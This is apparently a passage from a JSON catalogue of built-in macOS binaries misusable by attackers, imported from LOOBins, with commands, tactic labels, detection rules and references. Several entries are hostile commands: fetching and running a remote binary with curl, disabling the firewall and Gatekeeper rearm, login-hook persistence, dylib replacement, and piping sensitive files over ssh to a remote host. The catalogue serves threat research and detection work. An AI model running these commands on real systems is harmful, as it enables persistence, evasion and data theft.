Enumeration","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml","https://developer.apple.com/forums/thread/4002","https://attack.mitre.org/techniques/T1518/001/","https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:csrutil:bc2665f645a68439","toolId":"loobins:csrutil","toolName":"csrutil","name":"Add a netboot server","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"csrutil netboot add <address>","description":"Insert a new IPv4 address in the list of allowed NetBoot sources","mitre":[],"fullPath":["/usr/bin/csrutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: System Integrity Protection (SIP) Disabled","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml"},{"type":"Sigma: System Integrity Protection (SIP) Enumeration","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml","https://developer.apple.com/forums/thread/4002","https://attack.mitre.org/techniques/T1518/001/","https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:csrutil:3e74e76040ed06ba","toolId":"loobins:csrutil","toolName":"csrutil","name":"Map infrastructure","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Reconnaissance","Discovery"],"command":"csrutil netboot list","description":"List allowed NetBoot sources","mitre":[],"fullPath":["/usr/bin/csrutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: System Integrity Protection (SIP) Disabled","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml"},{"type":"Sigma: System Integrity Protection (SIP) Enumeration","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml","https://developer.apple.com/forums/thread/4002","https://attack.mitre.org/techniques/T1518/001/","https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:csrutil:33a98a8b396dd6ec","toolId":"loobins:csrutil","toolName":"csrutil","name":"Determine if SIP is enabled","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"csrutil status","description":"Determine if System Integrity Protection is enabled","mitre":[],"fullPath":["/usr/bin/csrutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: System Integrity Protection (SIP) Disabled","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml"},{"type":"Sigma: System Integrity Protection (SIP) Enumeration","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml","https://developer.apple.com/forums/thread/4002","https://attack.mitre.org/techniques/T1518/001/","https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:defaults:2be370c95286961d","toolId":"loobins:defaults","toolName":"defaults","name":"Disable Gatekeeper's auto rearm functionality","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"sudo defaults write /Library/Preferences/com.apple.security GKAutoRearm -bool NO","description":"The following command can be used to disable Gatekeepers rearm functionality. This command requires root privileges.","mitre":[],"fullPath":["/usr/bin/defaults"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml","https://macos-defaults.com/","https://www.huntress.com/blog/insistence-on-persistence"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:defaults:8f051a66b5fb0607","toolId":"loobins:defaults","toolName":"defaults","name":"Show mounted servers","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"defaults read com.apple.finder \"ShowMountedServersOnDesktop\"","description":"Show all mounted servers on the desktop.","mitre":[],"fullPath":["/usr/bin/defaults"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml","https://macos-defaults.com/","https://www.huntress.com/blog/insistence-on-persistence"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:defaults:4052ddb76eee1951","toolId":"loobins:defaults","toolName":"defaults","name":"Add a login item to the current user","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"sudo defaults write /Library/Preferences/com.apple.loginwindow LoginHook gain_persistence.sh","description":"An attacker can use defaults to add a login hook in attempt to gain persistence. This command requires root privileges.","mitre":[],"fullPath":["/usr/bin/defaults"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml","https://macos-defaults.com/","https://www.huntress.com/blog/insistence-on-persistence"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:defaults:16d24c230e14950e","toolId":"loobins:defaults","toolName":"defaults","name":"Get Active Directory user info from Jamf Connect","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"defaults read com.jamf.connect.state","description":"Retrieve Active Directory user info from Jamf Connect defaults configuration.","mitre":[],"fullPath":["/usr/bin/defaults"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml","https://macos-defaults.com/","https://www.huntress.com/blog/insistence-on-persistence"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:defaults:1600168e079bee30","toolId":"loobins:defaults","toolName":"defaults","name":"Enable Firewall","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 1","description":"Enables macOS' default firewall. This command requires root privileges.","mitre":[],"fullPath":["/usr/bin/defaults"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml","https://macos-defaults.com/","https://www.huntress.com/blog/insistence-on-persistence"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:defaults:72f81c54c9acbf93","toolId":"loobins:defaults","toolName":"defaults","name":"Disable Firewall","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0","description":"Disables macOS' default firewall. This command requires root privileges.","mitre":[],"fullPath":["/usr/bin/defaults"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml","https://macos-defaults.com/","https://www.huntress.com/blog/insistence-on-persistence"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:disown:e2c68d9f80308eca","toolId":"loobins:disown","toolName":"disown","name":"Start a process and remove it from the jobs table.","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"curl -O http://1.1.1.1/updated && chmod +x updated && ./updated & disown && pkill Terminal","description":"The following command downloads a remote binary, sets it to executable, executes the binary, disowns it from the shell it spawned from, and closes the terminal session.","mitre":[],"fullPath":["shell built-in command (bash)"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content at time of writing","value":"No detection content at time of writing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/disown.yml","https://linux.die.net/man/1/disown","https://man7.org/linux/man-pages/man1/bash.1.html","https://www.esentire.com/blog/poseidon-stealer-uses-sora-ai-lure-to-infect-macos"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ditto:a669d3fe27d2b814","toolId":"loobins:ditto","toolName":"ditto","name":"Copy and compress sensitive data locally","source":"LOOBins","platform":["macOS"],"capability":["Collection"],"nativeCategory":["Collection","Exfiltration"],"command":"ditto -c -k --sequesterRsrc --keepParent /home/user/sensitive-files /tmp/l00t.zip","description":"The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.","mitre":[],"fullPath":["/usr/bin/ditto"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content at time of writing","value":"No detection content at time of writing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml","https://ss64.com/osx/ditto.html","https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/","https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ditto:3956e8036c3f0ecc","toolId":"loobins:ditto","toolName":"ditto","name":"Remove extended attributes from a file","source":"LOOBins","platform":["macOS"],"capability":["Collection"],"nativeCategory":["Collection","Exfiltration"],"command":"ditto -c -k unsigned.app app.zip ditto -x -k app.zip unsigned.app 2>/dev/null","description":"ditto can be used to bypass Gatekeeper by removing the \"com.apple.quarantine\" extended attribute.","mitre":[],"fullPath":["/usr/bin/ditto"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content at time of writing","value":"No detection content at time of writing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml","https://ss64.com/osx/ditto.html","https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/","https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ditto:cdd3c14f73ed66d6","toolId":"loobins:ditto","toolName":"ditto","name":"Copy, compress, and transfer sensitive data to a remote macOS host","source":"LOOBins","platform":["macOS"],"capability":["Collection","Lateral Movement","Defense Evasion"],"nativeCategory":["Collection","Exfiltration","Lateral Movement","Defense Evasion"],"command":"ditto -c --norsrc /home/user/sensitive-files - | ssh remote_host ditto -x --norsrc - /home/user/l00t","description":"The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.","mitre":[],"fullPath":["/usr/bin/ditto"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content at time of writing","value":"No detection content at time of writing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml","https://ss64.com/osx/ditto.html","https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/","https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ditto:46f00f81c5001006","toolId":"loobins:ditto","toolName":"ditto","name":"DLL hijacking","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"ditto -V /path/to/malicious-library/malicious_library.dylib /path/to/target-library/original_library.dylib","description":"Replace a legitimate library with a malicious one while maintaining the original file permissions and attributes.","mitre":[],"fullPath":["/usr/bin/ditto"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content at time of writing","value":"No detection content at time of writing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml","https://ss64.com/osx/ditto.html","https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/","https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dns-sd:53f3998acc18fff6","toolId":"loobins:dns-sd","toolName":"dns-sd","name":"Discover SSH hosts","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dns-sd -B _ssh._tcp","description":"Hosts serving SSH can be discovered using the _ssh._tcp service string.","mitre":[],"fullPath":["/usr/bin/dns-sd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect dns-sd discovery activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml","https://themittenmac.com/what-does-apt-activity-look-like-on-macos","https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dns-sd:53dfc1310c71878f","toolId":"loobins:dns-sd","toolName":"dns-sd","name":"Discover web hosts","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dns-sd -B _http._tcp","description":"Hosts serving web services can be discovered using the _http._tcp service string.","mitre":[],"fullPath":["/usr/bin/dns-sd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect dns-sd discovery activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml","https://themittenmac.com/what-does-apt-activity-look-like-on-macos","https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dns-sd:fb0f781dd1ea98d0","toolId":"loobins:dns-sd","toolName":"dns-sd","name":"Discover hosts serving remote screen sharing","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dns-sd -B _rfb._tcp","description":"Hosts serving remote screen sharing can be discovered using the _rfb._tcp service string.","mitre":[],"fullPath":["/usr/bin/dns-sd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect dns-sd discovery activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml","https://themittenmac.com/what-does-apt-activity-look-like-on-macos","https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dns-sd:917b3a1e5a1ef7f0","toolId":"loobins:dns-sd","toolName":"dns-sd","name":"Discover hosts serving SMB","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dns-sd -B _smb._tcp","description":"Hosts serving SMB can be discovered using the _smb._tcp service string.","mitre":[],"fullPath":["/usr/bin/dns-sd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect dns-sd discovery activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml","https://themittenmac.com/what-does-apt-activity-look-like-on-macos","https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscacheutil:93caef4af761b12e","toolId":"loobins:dscacheutil","toolName":"dscacheutil","name":"Lookup a user","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscacheutil -q user -a name <USER_NAME>","description":"List the user information","mitre":[],"fullPath":["/usr/bin/dscacheutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscacheutil.yml","https://macosbin.com/bin/dscacheutil","https://ss64.com/osx/dscacheutil.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscacheutil:f6160d0f4f84e6d3","toolId":"loobins:dscacheutil","toolName":"dscacheutil","name":"Lookup all users","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscacheutil -q user","description":"List all user information","mitre":[],"fullPath":["/usr/bin/dscacheutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscacheutil.yml","https://macosbin.com/bin/dscacheutil","https://ss64.com/osx/dscacheutil.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:305c394aed388f3e","toolId":"loobins:dscl","toolName":"dscl","name":"Local user enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl . -list /Users\ndscl . list /Users\ndscl . ls /Users","description":"Enumerate all local users.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:87ecd9f8ac4a7b04","toolId":"loobins:dscl","toolName":"dscl","name":"Active Directory user enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl \"/Active Directory/TEST/All Domains\" -list /Users\ndscl \"/Active Directory/TEST/All Domains\" list /Users\ndscl \"/Active Directory/TEST/All Domains\" ls /Users","description":"Enumerate all Active Directory users.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:781562790fe8a5bc","toolId":"loobins:dscl","toolName":"dscl","name":"Local user information gathering","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl . -read /Users/$USERNAME\ndscl . read /Users/$USERNAME\ndscl . cat /Users/$USERNAME","description":"Gain useful local user information such as when their password was last set, their keyboard layout, their avatar, their home directory, UID and default shell.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:0aaf21612b3bff0f","toolId":"loobins:dscl","toolName":"dscl","name":"Active Directory user information gathering","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl \"/Active Directory/TEST/All Domains\" -read /Users/$USERNAME\ndscl \"/Active Directory/TEST/All Domains\" read /Users/$USERNAME\ndscl \"/Active Directory/TEST/All Domains\" cat /Users/$USERNAME","description":"Gain useful Active Directory user information such as when their password was last set, their keyboard layout, their avatar, their home directory, UID and default shell.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:bd588af20e609166","toolId":"loobins:dscl","toolName":"dscl","name":"Local group enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl . -list /Groups\ndscl . list /Groups\ndscl . ls /Groups","description":"Enumerate all local groups.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:df32b72c44b8006f","toolId":"loobins:dscl","toolName":"dscl","name":"Active Directory group enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl \"/Active Directory/TEST/All Domains\" -list /Groups\ndscl \"/Active Directory/TEST/All Domains\" list /Groups\ndscl \"/Active Directory/TEST/All Domains\" ls /Groups","description":"Enumerate all Active Directory groups.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:c4ea898c6011f465","toolId":"loobins:dscl","toolName":"dscl","name":"Local group information gathering","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl . -read /Groups/$GROUPNAME\ndscl . read /Groups/$GROUPNAME\ndscl . cat /Groups/$GROUPNAME","description":"Gain useful local group information such as which users belong to that group, SMB SIDs and group ID. Especially useful for the \"admin\" group.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:865a049f12f3d6ec","toolId":"loobins:dscl","toolName":"dscl","name":"Active Directory group information gathering","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl \"/Active Directory/TEST/All Domains\" -read /Groups/$GROUPNAME\ndscl \"/Active Directory/TEST/All Domains\" read /Groups/$GROUPNAME\ndscl \"/Active Directory/TEST/All Domains\" cat /Groups/$GROUPNAME","description":"Gain useful Active Directory group information such as which users belong to that group, SMB SIDs and group ID. Especially useful for the \"admin\" group.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:78cc0d939d564e02","toolId":"loobins:dscl","toolName":"dscl","name":"Computer enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl \"/Active Directory/TEST/All Domains\" -list /Computers\ndscl \"/Active Directory/TEST/All Domains\" list /Computers\ndscl \"/Active Directory/TEST/All Domains\" ls /Computers","description":"Enumerate all computers in an Active Directory.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with 